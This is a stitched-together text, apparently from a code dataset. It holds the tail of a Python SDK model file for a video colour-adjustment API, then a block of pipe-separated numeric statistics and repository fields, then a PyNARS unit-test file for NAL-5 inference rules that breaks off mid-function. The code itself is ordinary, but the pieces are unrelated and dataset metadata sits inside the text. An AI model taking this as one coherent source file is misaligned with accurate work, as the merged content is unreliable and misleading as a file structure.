self.validate_required(self.data, 'data')
if self.data:
self.data.validate()
def to_map(self):
result = {}
result['RequestId'] = self.request_id
if self.data is not None:
result['Data'] = self.data.to_map()
else:
result['Data'] = None
return result
def from_map(self, map={}):
self.request_id = map.get('RequestId')
if map.get('Data') is not None:
temp_model = AdjustVideoColorResponseData()
self.data = temp_model.from_map(map['Data'])
else:
self.data = None
return self
class AdjustVideoColorResponseData(TeaModel):
def __init__(self, video_url=None):
self.video_url = video_url
def validate(self):
self.validate_required(self.video_url, 'video_url')
def to_map(self):
result = {}
result['VideoUrl'] = self.video_url
return result
def from_map(self, map={}):
self.video_url = map.get('VideoUrl')
return self
class AdjustVideoColorAdvanceRequest(TeaModel):
def __init__(self, video_url_object=None, video_bitrate=None, video_codec=None, video_format=None, mode=None):
self.video_url_object = video_url_object
self.video_bitrate = video_bitrate
self.video_codec = video_codec
self.video_format = video_format
self.mode = mode
def validate(self):
self.validate_required(self.video_url_object, 'video_url_object')
self.validate_required(self.mode, 'mode')
def to_map(self):
result = {}
result['VideoUrlObject'] = self.video_url_object
result['VideoBitrate'] = self.video_bitrate
result['VideoCodec'] = self.video_codec
result['VideoFormat'] = self.video_format
result['Mode'] = self.mode
return result
def from_map(self, map={}):
self.video_url_object = map.get('VideoUrlObject')
self.video_bitrate = map.get('VideoBitrate')
self.video_codec = map.get('VideoCodec')
self.video_format = map.get('VideoFormat')
self.mode = map.get('Mode')
return self
| 31.194194
| 200
| 0.603376
| 3,801
| 31,163
| 4.731123
| 0.036832
| 0.068509
| 0.073403
| 0.084079
| 0.843018
| 0.832119
| 0.813991
| 0.792137
| 0.76539
| 0.744258
| 0
| 0
| 0.279241
| 31,163
| 998
| 201
| 31.225451
| 0.800632
| 0.001637
| 0
| 0.848086
| 1
| 0
| 0.072035
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.177033
| false
| 0.002392
| 0.001196
| 0
| 0.311005
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
671c7d8f987b5ef026ab9c485d0612db3dd91853
| 44,997
|
py
|
Python
|
Tests/test_NAL/test_NAL5.py
|
AIxer/PyNARS
|
443b6a5e1c9779a1b861df1ca51ce5a190998d2e
|
[
"MIT"
] | null | null | null |
Tests/test_NAL/test_NAL5.py
|
AIxer/PyNARS
|
443b6a5e1c9779a1b861df1ca51ce5a190998d2e
|
[
"MIT"
] | null | null | null |
Tests/test_NAL/test_NAL5.py
|
AIxer/PyNARS
|
443b6a5e1c9779a1b861df1ca51ce5a190998d2e
|
[
"MIT"
] | null | null | null |
'''
test NAL5
'''
import unittest
from pathlib import Path
from pynars import NARS, Narsese
import Tests.utils_for_test as utils_for_test
from pynars.NAL.MetaLevelInference.VariableSubstitution import *
from pynars.NARS import Reasoner as Reasoner
from pynars.NARS.DataStructures import Bag, Concept, Table, Task
from pynars.NARS.DataStructures._py.Link import TaskLink, TermLink
from pynars.NARS.RuleMap import RuleMap
from pynars.Narsese import (Compound, Connector, Copula, Judgement, Statement, Term,
Truth, Variable, VarPrefix)
from Tests.utils_for_test import *
# utils_for_test.rule_map = RuleMap_v2()
class TEST_NAL5(unittest.TestCase):
''''''
def test_revision(self):
'''
'Revision
'If robin can fly then robin is a type of bird.
<<robin --> [flying]> ==> <robin --> bird>>. %1.00;0.90%
'If robin can fly then robin may not a type of bird.
<<robin --> [flying]> ==> <robin --> bird>>. %0.00;0.60%
1
'If robin can fly then robin is a type of bird.
''outputMustContain('<<robin --> [flying]> ==> <robin --> bird>>. %0.86;0.91%')
'''
tasks_derived = memory_accept_revision(
'<<robin --> [flying]> ==> <robin --> bird>>. %1.00;0.90%',
'<<robin --> [flying]> ==> <robin --> bird>>. %0.00;0.60% '
)
self.assertTrue(
output_contains(tasks_derived, '<<robin --> [flying]> ==> <robin --> bird>>. %0.86;0.91%')
)
pass
def test_deduction(self):
'''
'Deduction
'If robin is a type of bird then robin is a type of animal.
<<robin --> bird> ==> <robin --> animal>>. %1.00;0.9%
'If robin can fly then robin is a type of bird.
<<robin --> [flying]> ==> <robin --> bird>>. %1.00;0.9%
14
'If robin can fly then robin is a type of animal.
''outputMustContain('<<robin --> [flying]> ==> <robin --> animal>>. %1.00;0.81%')
'''
rules, task, belief, concept, task_link, term_link, result1, result2 = rule_map_two_premises(
'<<robin --> bird> ==> <robin --> animal>>. %1.00;0.9%',
'<<robin --> [flying]> ==> <robin --> bird>>. %1.00;0.9%',
'<robin --> bird>.', index_task=(0,), index_belief=(1,))
tasks_derived = [rule(task, belief, task_link, term_link) for rule in rules]
self.assertTrue(
output_contains(tasks_derived, '<<robin --> [flying]> ==> <robin --> animal>>. %1.00;0.81%')
)
pass
def test_exemplification(self):
'''
'Exemplification
'If robin can fly then robin is a type of bird.
<<robin --> [flying]> ==> <robin --> bird>>. %1.00;0.90%
'If robin is a type of bird then robin is a type of animal.
<<robin --> bird> ==> <robin --> animal>>. %1.00;0.90%
19
'I guess if robin is a type of animal then robin can fly.
''outputMustContain('<<robin --> animal> ==> <robin --> [flying]>>. %1.00;0.45%')
'''
rules, task, belief, concept, task_link, term_link, result1, result2 = rule_map_two_premises(
'<<robin --> [flying]> ==> <robin --> bird>>. %1.00;0.90%',
'<<robin --> bird> ==> <robin --> animal>>. %1.00;0.90%',
'<robin --> bird>.', index_task=(1,), index_belief=(0,))
tasks_derived = [rule(task, belief, task_link, term_link) for rule in rules]
self.assertTrue(
output_contains(tasks_derived, '<<robin --> animal> ==> <robin --> [flying]>>. %1.00;0.45%')
)
pass
def test_induction(self):
'''
'Induction
'If robin is a type of bird then robin is a type of animal.
<<robin --> bird> ==> <robin --> animal>>. %1.00;0.90%
'If robin is a type of bird then robin can fly.
<<robin --> bird> ==> <robin --> [flying]>>. %0.80;0.90%
140
'I guess if robin can fly then robin is a type of animal.
''outputMustContain('<<robin --> [flying]> ==> <robin --> animal>>. %1.00;0.39%')
'I guess if robin is a type of animal then robin can fly.
''outputMustContain('<<robin --> animal> ==> <robin --> [flying]>>. %0.80;0.45%')
'''
rules, task, belief, concept, task_link, term_link, result1, result2 = rule_map_two_premises(
'<<robin --> bird> ==> <robin --> animal>>. %1.00;0.90%',
'<<robin --> bird> ==> <robin --> [flying]>>. %0.80;0.90%',
'<robin --> bird>.', index_task=(0,), index_belief=(0,))
tasks_derived = [rule(task, belief, task_link, term_link) for rule in rules]
self.assertTrue(
output_contains(tasks_derived, '<<robin --> animal> ==> <robin --> [flying]>>. %0.80;0.45%')
)
# for task in tasks_derived:
# print(task)
pass
def test_abduction(self):
'''
'Abduction
'If robin is a type of bird then robin is a type of animal.
<<robin --> bird> ==> <robin --> animal>>. %1.00;0.90%
'If robin can fly then robin is probably a type of animal.
<<robin --> [flying]> ==> <robin --> animal>>. %0.80;0.90%
19
'I guess if robin is a type of bird then robin can fly.
''outputMustContain('<<robin --> bird> ==> <robin --> [flying]>>. %1.00;0.39%')
'I guess if robin can fly then robin is a type of bird.
''outputMustContain('<<robin --> [flying]> ==> <robin --> bird>>. %0.80;0.45%')
'''
rules, task, belief, concept, task_link, term_link, result1, result2 = rule_map_two_premises(
'<<robin --> bird> ==> <robin --> animal>>. %1.00;0.90%',
'<<robin --> [flying]> ==> <robin --> animal>>. %0.80;0.90%',
'<robin --> animal>.', index_task=(1,), index_belief=(1,))
tasks_derived = [rule(task, belief, task_link, term_link) for rule in rules]
self.assertTrue(
output_contains(tasks_derived, '<<robin --> [flying]> ==> <robin --> bird>>. %0.80;0.45%')
)
for task in tasks_derived:
print(task)
pass
def test_conditional_deduction_0(self):
'''
'Detachment
'If robin is a type of bird then robin can fly.
<<robin --> bird> ==> <robin --> animal>>. %1.00;0.90%
'Robin is a type of bird.
<robin --> bird>. %1.00;0.90%
1
'Robin is a type of animal.
''outputMustContain('<robin --> animal>. %1.00;0.81%')
'''
rules, task, belief, concept, task_link, term_link, result1, result2 = rule_map_two_premises(
'<<robin --> bird> ==> <robin --> animal>>. %1.00;0.90%',
'<robin --> bird>. %1.00;0.90%',
'<robin --> bird>.', index_task=(0,), index_belief=())
tasks_derived = [rule(task, belief, task_link, term_link) for rule in rules]
self.assertTrue(
output_contains(tasks_derived, '<robin --> animal>. %1.00;0.81%')
)
rules, task, belief, concept, task_link, term_link, result1, result2 = rule_map_two_premises(
'<robin --> bird>. %1.00;0.90%',
'<<robin --> bird> ==> <robin --> animal>>. %1.00;0.90%',
'<robin --> bird>.', index_task=(), index_belief=(0,))
tasks_derived = [rule(task, belief, task_link, term_link) for rule in rules]
self.assertTrue(
output_contains(tasks_derived, '<robin --> animal>. %1.00;0.81%')
)
pass
def test_conditional_abduction(self):
'''
'Detachment
'Usually if robin is a type of bird then robin is a type of animal.
<<robin --> bird> ==> <robin --> animal>>. %0.70;0.90%
'Robin is a type of animal.
<robin --> animal>. %1.00;0.90%
1
'I guess robin is a type of bird.
''outputMustContain('<robin --> bird>. %1.00;0.36%')
'''
rules, task, belief, concept, task_link, term_link, result1, result2 = rule_map_two_premises(
'<<robin --> bird> ==> <robin --> animal>>. %0.70;0.90%',
'<robin --> animal>. %1.00;0.90%',
'<robin --> animal>.', index_task=(1,), index_belief=())
tasks_derived = [rule(task, belief, task_link, term_link) for rule in rules]
self.assertTrue(
output_contains(tasks_derived, '<robin --> bird>. %1.00;0.36%')
)
pass
def test_comparison_0(self):
'''
'Detachment
'If robin is a type of bird then robin is a type of animal.
<<robin --> bird> ==> <robin --> animal>>. %1.00;0.90%
'If robin is a type of bird then robin can fly.
<<robin --> bird> ==> <robin --> [flying]>>. %0.80;0.90%
14
'I guess robin is a type of animal if and only if robin can fly.
''outputMustContain('<<robin --> [flying]> <=> <robin --> animal>>. %0.80;0.45%')
'''
rules, task, belief, concept, task_link, term_link, result1, result2 = rule_map_two_premises(
'<<robin --> bird> ==> <robin --> animal>>. %1.00;0.90%',
'<<robin --> bird> ==> <robin --> [flying]>>. %0.80;0.90%',
'<robin --> bird>.', index_task=(0,), index_belief=(0,))
tasks_derived = [rule(task, belief, task_link, term_link) for rule in rules]
self.assertTrue(
output_contains(tasks_derived, '<<robin --> [flying]> <=> <robin --> animal>>. %0.80;0.45%')
)
pass
def test_comparison_1(self):
'''
'Detachment
'If robin is a type of bird then usually robin is a type of animal.
<<robin --> bird> ==> <robin --> animal>>. %0.70;0.90%
'If robin can fly then robin is a type of animal.
<<robin --> [flying]> ==> <robin --> animal>>. %1.00;0.90%
19
'I guess robin is a type of bird if and only if robin can fly.
''outputMustContain('<<robin --> [flying]> <=> <robin --> bird>>. %0.70;0.45%')
'''
rules, task, belief, concept, task_link, term_link, result1, result2 = rule_map_two_premises(
'<<robin --> bird> ==> <robin --> animal>>. %0.70;0.90%',
'<<robin --> [flying]> ==> <robin --> animal>>. %1.00;0.90%',
'<robin --> animal>.', index_task=(1,), index_belief=(1,))
tasks_derived = [rule(task, belief, task_link, term_link) for rule in rules]
self.assertTrue(
output_contains(tasks_derived, '<<robin --> [flying]> <=> <robin --> bird>>. %0.70;0.45%')
)
pass
def test_analogy(self):
'''
'Detachment
'If robin is a type of bird then robin is a type of animal.
<<robin --> bird> ==> <robin --> animal>>. %1.00;0.90%
'Usually, robin is a type of bird if and only if robin can fly.
<<robin --> bird> <=> <robin --> [flying]>>. %0.80;0.90%
14
'If robin can fly then probably robin is a type of animal.
''outputMustContain('<<robin --> [flying]> ==> <robin --> animal>>. %0.80;0.65%')
'''
rules, task, belief, concept, task_link, term_link, result1, result2 = rule_map_two_premises(
'<<robin --> bird> ==> <robin --> animal>>. %1.00;0.90%',
'<<robin --> bird> <=> <robin --> [flying]>>. %0.80;0.90%',
'<robin --> bird>.', index_task=(0,), index_belief=(0,))
tasks_derived = [rule(task, belief, task_link, term_link) for rule in rules]
self.assertTrue(
output_contains(tasks_derived, '<<robin --> [flying]> ==> <robin --> animal>>. %0.80;0.65%')
)
pass
def test_conditional_analogy(self):
'''
'Detachment
'Robin is a type of bird.
<robin --> bird>. %1.00;0.90%
'Usually, robin is a type of bird if and only if robin can fly.
<<robin --> bird> <=> <robin --> [flying]>>. %0.80;0.90%
1
'I guess usually robin can fly.
''outputMustContain('<robin --> [flying]>. %0.80;0.65%')
'''
rules, task, belief, concept, task_link, term_link, result1, result2 = rule_map_two_premises(
'<robin --> bird>. %1.00;0.90%',
'<<robin --> bird> <=> <robin --> [flying]>>. %0.80;0.90%',
'<robin --> bird>.', index_task=(), index_belief=(0,))
tasks_derived = [rule(task, belief, task_link, term_link) for rule in rules]
self.assertTrue(
output_contains(tasks_derived, '<robin --> [flying]>. %0.80;0.65%')
)
rules, task, belief, concept, task_link, term_link, result1, result2 = rule_map_two_premises(
'<<robin --> bird> <=> <robin --> [flying]>>. %0.80;0.90%',
'<robin --> bird>. %1.00;0.90%',
'<robin --> bird>.', index_task=(0,), index_belief=())
tasks_derived = [rule(task, belief, task_link, term_link) for rule in rules]
self.assertTrue(
output_contains(tasks_derived, '<robin --> [flying]>. %0.80;0.65%')
)
rules, task, belief, concept, task_link, term_link, result1, result2 = rule_map_two_premises(
'<robin --> bird>. %1.00;0.90%',
'<<robin --> [flying]> <=> <robin --> bird>>. %0.80;0.90%',
'<robin --> bird>.', index_task=(), index_belief=(0,))
tasks_derived = [rule(task, belief, task_link, term_link) for rule in rules]
self.assertTrue(
output_contains(tasks_derived, '<robin --> [flying]>. %0.80;0.65%')
)
rules, task, belief, concept, task_link, term_link, result1, result2 = rule_map_two_premises(
'<<robin --> [flying]> <=> <robin --> bird>>. %0.80;0.90%',
'<robin --> bird>. %1.00;0.90%',
'<robin --> bird>.', index_task=(0,), index_belief=())
tasks_derived = [rule(task, belief, task_link, term_link) for rule in rules]
self.assertTrue(
output_contains(tasks_derived, '<robin --> [flying]>. %0.80;0.65%')
)
pass
def test_resemblance(self):
'''
'Detachment
'Robin is a type of animal if and only if robin is a type of bird.
<<robin --> animal> <=> <robin --> bird>>. %1.00;0.90%
'Robin is a type of bird if and only if robin can fly.
<<robin --> bird> <=> <robin --> [flying]>>. %0.90;0.90%
19
'Robin is a type of animal if and only if robin can fly.
''outputMustContain('<<robin --> [flying]> <=> <robin --> animal>>. %0.90;0.81%')
'''
rules, task, belief, concept, task_link, term_link, result1, result2 = rule_map_two_premises(
'<<robin --> animal> <=> <robin --> bird>>. %1.00;0.90%',
'<<robin --> bird> <=> <robin --> [flying]>>. %0.90;0.90% ',
'<robin --> bird>.', index_task=(1,), index_belief=(0,))
tasks_derived = [rule(task, belief, task_link, term_link) for rule in rules]
self.assertTrue(
output_contains(tasks_derived, '<<robin --> [flying]> <=> <robin --> animal>>. %0.90;0.81%')
)
pass
def test_conversions_between_implication_and_equivalence(self):
'''
'conversions between Implication and Equivalence
'If robin can fly then robin is a type of bird.
<<robin --> [flying]> ==> <robin --> bird>>. %0.90;0.90%
'If robin is a type of bird then robin can fly.
<<robin --> bird> ==> <robin --> [flying]>>. %0.90;0.90%
7
'Robin can fly if and only if robin is a type of bird.
''outputMustContain('<<robin --> [flying]> <=> <robin --> bird>>. %0.81;0.81%')
'''
rules, task, belief, concept, task_link, term_link, result1, result2 = rule_map_two_premises(
'<<robin --> [flying]> ==> <robin --> bird>>. %0.90;0.90%',
'<<robin --> bird> ==> <robin --> [flying]>>. %0.90;0.90%',
'<robin --> bird>.', index_task=(1,), index_belief=(0,))
tasks_derived = [rule(task, belief, task_link, term_link) for rule in rules]
self.assertTrue(
output_contains(tasks_derived, '<<robin --> [flying]> <=> <robin --> bird>>. %0.81;0.81%')
)
pass
def test_conjunction_0(self):
'''
'compound composition, two premises
'If robin is a type of bird then robin is a type of animal.
<<robin --> bird> ==> <robin --> animal>>. %1.00;0.90%
'If robin is a type of bird then robin can fly.
<<robin --> bird> ==> <robin --> [flying]>>. %0.90;0.90%
14
'If robin is a type of bird then usually robin is a type of animal and can fly.
''outputMustContain('<<robin --> bird> ==> (&&,<robin --> [flying]>,<robin --> animal>)>. %0.90;0.81%')
'''
rules, task, belief, concept, task_link, term_link, result1, result2 = rule_map_two_premises(
'<<robin --> bird> ==> <robin --> animal>>. %1.00;0.90%',
'<<robin --> bird> ==> <robin --> [flying]>>. %0.90;0.90%',
'<robin --> bird>.', index_task=(0,), index_belief=(0,))
tasks_derived = [rule(task, belief, task_link, term_link) for rule in rules]
self.assertTrue(
output_contains(tasks_derived, '<<robin --> bird> ==> (&&,<robin --> [flying]>,<robin --> animal>)>. %0.90;0.81%')
)
rules, task, belief, concept, task_link, term_link, result1, result2 = rule_map_two_premises(
'<<robin --> bird> ==> <robin --> animal>>. %1.00;0.90%',
'<<robin --> bird> ==> <robin --> [flying]>>. %0.90;0.90%',
'robin.', index_task=(0,0), index_belief=(0,0))
tasks_derived = [rule(task, belief, task_link, term_link) for rule in rules]
self.assertTrue(
output_contains(tasks_derived, '<<robin --> bird> ==> (&&,<robin --> [flying]>,<robin --> animal>)>. %0.90;0.81%')
)
pass
def test_conjunction_1(self):
'''
'compound composition, two premises
'If robin is a type of bird then robin is a type of animal.
<<robin --> bird> ==> <robin --> animal>>. %1.00;0.90%
'If robin can fly then robin is a type of animal.
<<robin --> [flying]> ==> <robin --> animal>>. %0.90;0.90%
19
'If robin can fly and is a type of bird then robin is a type of animal.
''outputMustContain('<(&&,<robin --> [flying]>,<robin --> bird>) ==> <robin --> animal>>. %1.00;0.81%')
'''
rules, task, belief, concept, task_link, term_link, result1, result2 = rule_map_two_premises(
'<<robin --> bird> ==> <robin --> animal>>. %1.00;0.90%',
'<<robin --> [flying]> ==> <robin --> animal>>. %0.90;0.90% ',
'<robin --> animal>.', index_task=(1,), index_belief=(1,))
tasks_derived = [rule(task, belief, task_link, term_link) for rule in rules]
self.assertTrue(
output_contains(tasks_derived, '<(&&,<robin --> [flying]>,<robin --> bird>) ==> <robin --> animal>>. %1.00;0.81%')
)
pass
def test_disjunction_0(self):
'''
'compound composition, two premises
'If robin is a type of bird then robin is a type of animal.
<<robin --> bird> ==> <robin --> animal>>. %1.00;0.90%
'If robin is a type of bird then robin can fly.
<<robin --> bird> ==> <robin --> [flying]>>. %0.90;0.90%
14
'If robin is a type of bird then robin is a type of animal or can fly.
''outputMustContain('<<robin --> bird> ==> (||,<robin --> [flying]>,<robin --> animal>)>. %1.00;0.81%')
'''
rules, task, belief, concept, task_link, term_link, result1, result2 = rule_map_two_premises(
'<<robin --> bird> ==> <robin --> animal>>. %1.00;0.90%',
'<<robin --> bird> ==> <robin --> [flying]>>. %0.90;0.90%',
'<robin --> bird>.', index_task=(0,), index_belief=(0,))
tasks_derived = [rule(task, belief, task_link, term_link) for rule in rules]
self.assertTrue(
output_contains(tasks_derived, '<<robin --> bird> ==> (||,<robin --> [flying]>,<robin --> animal>)>. %1.00;0.81%')
)
pass
def test_disjunction_1(self):
'''
'compound composition, two premises
'If robin is a type of bird then robin is a type of animal.
<<robin --> bird> ==> <robin --> animal>>. %1.00;0.90%
'If robin can fly then robin is a type of animal.
<<robin --> [flying]> ==> <robin --> animal>>. %0.90;0.90%
19
'If robin can fly or is a type of bird then robin is a type of animal.
''outputMustContain('<(||,<robin --> [flying]>,<robin --> bird>) ==> <robin --> animal>>. %0.90;0.81%')
'''
rules, task, belief, concept, task_link, term_link, result1, result2 = rule_map_two_premises(
'<<robin --> bird> ==> <robin --> animal>>. %1.00;0.90%',
'<<robin --> [flying]> ==> <robin --> animal>>. %0.90;0.90% ',
'<robin --> animal>.', index_task=(1,), index_belief=(1,))
tasks_derived = [rule(task, belief, task_link, term_link) for rule in rules]
self.assertTrue(
output_contains(tasks_derived, '<(||,<robin --> [flying]>,<robin --> bird>) ==> <robin --> animal>>. %0.90;0.81%')
)
pass
def test_decomposition_0(self):
'''
'compound decomposition, two premises
'If robin is a type of bird then robin is not a type of flying animal.
<<robin --> bird> ==> (&&,<robin --> animal>,<robin --> [flying]>)>. %0.00;0.90%
'If robin is a type of bird then robin can fly.
<<robin --> bird> ==> <robin --> [flying]>>. %1.00;0.90%
8
'It is unlikely that if a robin is a type of bird then robin is a type of animal.
''outputMustContain('<<robin --> bird> ==> <robin --> animal>>. %0.00;0.81%')
'''
rules, task, belief, concept, task_link, term_link, result1, result2 = rule_map_two_premises(
'<<robin --> bird> ==> (&&,<robin --> animal>,<robin --> [flying]>)>. %0.00;0.90%',
'<<robin --> bird> ==> <robin --> [flying]>>. %1.00;0.90%',
'<robin --> bird>.', index_task=(0,), index_belief=(0,))
tasks_derived = [rule(task, belief, task_link, term_link) for rule in rules]
self.assertTrue(
output_contains(tasks_derived, '<<robin --> bird> ==> <robin --> animal>>. %0.00;0.81%')
)
pass
def test_decomposition_1(self):
'''
'compound decomposition, two premises
'Robin cannot be both a flyer and a swimmer.
(&&,<robin --> [flying]>,<robin --> swimmer>). %0.00;0.90%
'Robin can fly.
<robin --> [flying]>. %1.00;0.90%
6
'Robin cannot swim.
''outputMustContain('<robin --> swimmer>. %0.00;0.81%')
'''
rules, task, belief, concept, task_link, term_link, result1, result2 = rule_map_two_premises(
'(&&,<robin --> [flying]>,<robin --> swimmer>). %0.00;0.90% ',
'<robin --> [flying]>. %1.00;0.90%',
'robin.')
tasks_derived = [rule(task, belief, task_link, term_link) for rule in rules]
self.assertTrue(
output_contains(tasks_derived, '<robin --> swimmer>. %0.00;0.81%')
)
rules, task, belief, concept, task_link, term_link, result1, result2 = rule_map_two_premises(
'(&&,<robin --> [flying]>,<robin --> swimmer>). %0.00;0.90% ',
'<robin --> [flying]>. %1.00;0.90%',
'(&&,<robin --> [flying]>,<robin --> swimmer>).')
tasks_derived = [rule(task, belief, task_link, term_link) for rule in rules]
self.assertTrue(
output_contains(tasks_derived, '<robin --> swimmer>. %0.00;0.81%')
)
rules, task, belief, concept, task_link, term_link, result1, result2 = rule_map_two_premises(
'<robin --> [flying]>. %1.00;0.90%',
'(&&,<robin --> [flying]>,<robin --> swimmer>). %0.00;0.90% ',
'robin.')
tasks_derived = [rule(task, belief, task_link, term_link) for rule in rules]
self.assertTrue(
output_contains(tasks_derived, '<robin --> swimmer>. %0.00;0.81%')
)
rules, task, belief, concept, task_link, term_link, result1, result2 = rule_map_two_premises(
'<robin --> [flying]>. %1.00;0.90%',
'(&&,<robin --> [flying]>,<robin --> swimmer>). %0.00;0.90% ',
'<robin --> [flying]>.')
tasks_derived = [rule(task, belief, task_link, term_link) for rule in rules]
self.assertTrue(
output_contains(tasks_derived, '<robin --> swimmer>. %0.00;0.81%')
)
pass
def test_decomposition_2(self):
'''
'compound decomposition, two premises
'Robin can fly or swim.
(||,<robin --> [flying]>,<robin --> swimmer>). %1.00;0.90%
'Robin cannot swim.
<robin --> swimmer>. %0.00;0.90%
2
'Robin can fly.
''outputMustContain('<robin --> [flying]>. %1.00;0.81%')
'''
rules, task, belief, concept, task_link, term_link, result1, result2 = rule_map_two_premises(
'(||,<robin --> [flying]>,<robin --> swimmer>). %1.00;0.90% ',
'<robin --> swimmer>. %0.00;0.90%',
'robin.', index_task=(0,0), index_belief=(0,))
tasks_derived = [rule(task, belief, task_link, term_link) for rule in rules]
self.assertTrue(
output_contains(tasks_derived, '<robin --> [flying]>. %1.00;0.81%')
)
def test_composition_0(self):
'''
'compound decomposition, two premises
'Robin can fly.
<robin --> [flying]>. %1.00;0.90%
'Can robin fly or swim?
(||,<robin --> [flying]>,<robin --> swimmer>)?
7
''//+1 from original
'Robin can fly or swim.
''outputMustContain('(||,<robin --> [flying]>,<robin --> swimmer>). %1.00;0.81%')
'''
rules, task, belief, concept, task_link, term_link, result1, result2 = rule_map_two_premises(
'<robin --> [flying]>. %1.00;0.90%',
'(||,<robin --> [flying]>,<robin --> swimmer>)?',
'<robin --> [flying]>.', is_belief_term=True, index_task=(), index_belief=(0,))
tasks_derived = [rule(task, belief.term, task_link, term_link) for rule in rules]
self.assertTrue(
output_contains(tasks_derived, '(||,<robin --> [flying]>,<robin --> swimmer>). %1.00;0.81%')
)
rules, task, belief, concept, task_link, term_link, result1, result2 = rule_map_two_premises(
'<robin --> [flying]>. %1.00;0.90%',
'(||,<robin --> [flying]>,<robin --> swimmer>)?',
'robin.', is_belief_term=True, index_task=(0,), index_belief=(0,0))
tasks_derived = [rule(task, belief.term, task_link, term_link) for rule in rules]
self.assertTrue(
output_contains(tasks_derived, '(||,<robin --> [flying]>,<robin --> swimmer>). %1.00;0.81%')
)
def test_composition_1(self):
'''
'compound decomposition, two premises
'Robin can fly and swim.
$0.90;0.90$ (&&,<robin --> swimmer>,<robin --> [flying]>). %0.90;0.90%
1
'Robin can swim.
''outputMustContain('<robin --> swimmer>. %0.90;0.73%')
5
''//+2 from original
'Robin can fly.
''outputMustContain('<robin --> [flying]>. %0.90;0.73%')
'''
rules, task, belief, concept, task_link, term_link, result1, result2 = rule_map_two_premises(
'$0.90;0.90$ (&&,<robin --> swimmer>,<robin --> [flying]>). %0.90;0.90%',
'<robin --> swimmer>.',
'(&&,<robin --> swimmer>,<robin --> [flying]>).', is_belief_term=True, index_task=(), index_belief=(0,))
tasks_derived = [rule(task, belief.term, task_link, term_link) for rule in rules]
self.assertTrue(
output_contains(tasks_derived, '<robin --> swimmer>. %0.90;0.73%')
)
rules, task, belief, concept, task_link, term_link, result1, result2 = rule_map_two_premises(
'$0.90;0.90$ (&&,<robin --> swimmer>,<robin --> [flying]>). %0.90;0.90%',
'<robin --> [flying]>.',
'(&&,<robin --> swimmer>,<robin --> [flying]>).', is_belief_term=True, index_task=(), index_belief=(1,))
tasks_derived = [rule(task, belief.term, task_link, term_link) for rule in rules]
self.assertTrue(
output_contains(tasks_derived, '<robin --> [flying]>. %0.90;0.73%')
)
rules, task, belief, concept, task_link, term_link, result1, result2 = rule_map_two_premises(
'$0.90;0.90$ (&&,<robin --> swimmer>,<robin --> [flying]>). %0.90;0.90%',
'<robin --> swimmer>.',
'robin.', is_belief_term=True, index_task=(0,0), index_belief=(0,))
tasks_derived = [rule(task, belief.term, task_link, term_link) for rule in rules]
self.assertTrue(
output_contains(tasks_derived, '<robin --> swimmer>. %0.90;0.73%')
)
rules, task, belief, concept, task_link, term_link, result1, result2 = rule_map_two_premises(
'$0.90;0.90$ (&&,<robin --> swimmer>,<robin --> [flying]>). %0.90;0.90%',
'<robin --> [flying]>.',
'robin.', is_belief_term=True, index_task=(1,0), index_belief=(0,))
tasks_derived = [rule(task, belief.term, task_link, term_link) for rule in rules]
self.assertTrue(
output_contains(tasks_derived, '<robin --> [flying]>. %0.90;0.73%')
)
def test_negation_0(self):
'''
'negation
'It is unlikely that robin cannot fly.
(--,<robin --> [flying]>). %0.10;0.90%
3
'Robin can fly.
''outputMustContain('<robin --> [flying]>. %0.90;0.90%')
'''
rules, task, belief, concept, task_link, term_link, result1, result2 = rule_map_two_premises(
'<robin --> [flying]>. %0.90;0.90%',
'(--,<robin --> [flying]>)?',
'<robin --> [flying]>.', is_belief_term=True, index_task=(), index_belief=(0,))
tasks_derived = [rule(task, belief.term, task_link, term_link) for rule in rules]
self.assertTrue(
output_contains(tasks_derived, '(--,<robin --> [flying]>). %0.10;0.90%')
)
rules, task, belief, concept, task_link, term_link, result1, result2 = rule_map_two_premises(
'<robin --> [flying]>. %0.90;0.90%',
'(--,<robin --> [flying]>)?',
'robin.', is_belief_term=True, index_task=(0,), index_belief=(0,0))
tasks_derived = [rule(task, belief.term, task_link, term_link) for rule in rules]
self.assertTrue(
output_contains(tasks_derived, '(--,<robin --> [flying]>). %0.10;0.90%')
)
rules, task, belief, concept, task_link, term_link, result1, result2 = rule_map_two_premises(
'(--,<robin --> [flying]>). %0.10;0.90%',
'<robin --> [flying]>.',
'robin.', is_belief_term=True, index_task=(0,0), index_belief=(0,))
tasks_derived = [rule(task, belief.term, task_link, term_link) for rule in rules]
self.assertTrue(
output_contains(tasks_derived, '<robin --> [flying]>. %0.90;0.90%')
)
rules, task, belief, concept, task_link, term_link, result1, result2 = rule_map_two_premises(
'(--,<robin --> [flying]>). %0.10;0.90%',
'robin.',
'(--,<robin --> [flying]>).', is_belief_term=True, index_task=(), index_belief=(0,0))
tasks_derived = [rule(task, belief.term, task_link, term_link) for rule in rules]
self.assertTrue(
output_contains(tasks_derived, '<robin --> [flying]>. %0.90;0.90%')
)
rules, task, belief, concept, task_link, term_link, result1, result2 = rule_map_two_premises(
'(--,<robin --> [flying]>). %0.10;0.90%',
'<robin --> [flying]>.',
'(--,<robin --> [flying]>).', is_belief_term=True, index_task=(), index_belief=(0,))
tasks_derived = [rule(task, belief.term, task_link, term_link) for rule in rules]
self.assertTrue(
output_contains(tasks_derived, '<robin --> [flying]>. %0.90;0.90%')
)
def test_negation_1(self):
'''
'negation
'Robin can fly.
<robin --> [flying]>. %0.90;0.90%
'Can robin fly or not?
(--,<robin --> [flying]>)?
''//15
30
'It is unlikely that robin cannot fly.
''outputMustContain('(--,<robin --> [flying]>). %0.10;0.90%')
'''
rules, task, belief, concept, task_link, term_link, result1, result2 = rule_map_two_premises(
'<robin --> [flying]>. %0.90;0.90%',
'(--,<robin --> [flying]>)?',
'<robin --> [flying]>.', is_belief_term=True, index_task=(), index_belief=(0,))
tasks_derived = [rule(task, belief.term, task_link, term_link) for rule in rules]
self.assertTrue(
output_contains(tasks_derived, '(--,<robin --> [flying]>). %0.10;0.90%')
)
rules, task, belief, concept, task_link, term_link, result1, result2 = rule_map_two_premises(
'<robin --> [flying]>. %0.90;0.90%',
'(--,<robin --> [flying]>)?',
'robin.', is_belief_term=True, index_task=(0,), index_belief=(0,0))
tasks_derived = [rule(task, belief.term, task_link, term_link) for rule in rules]
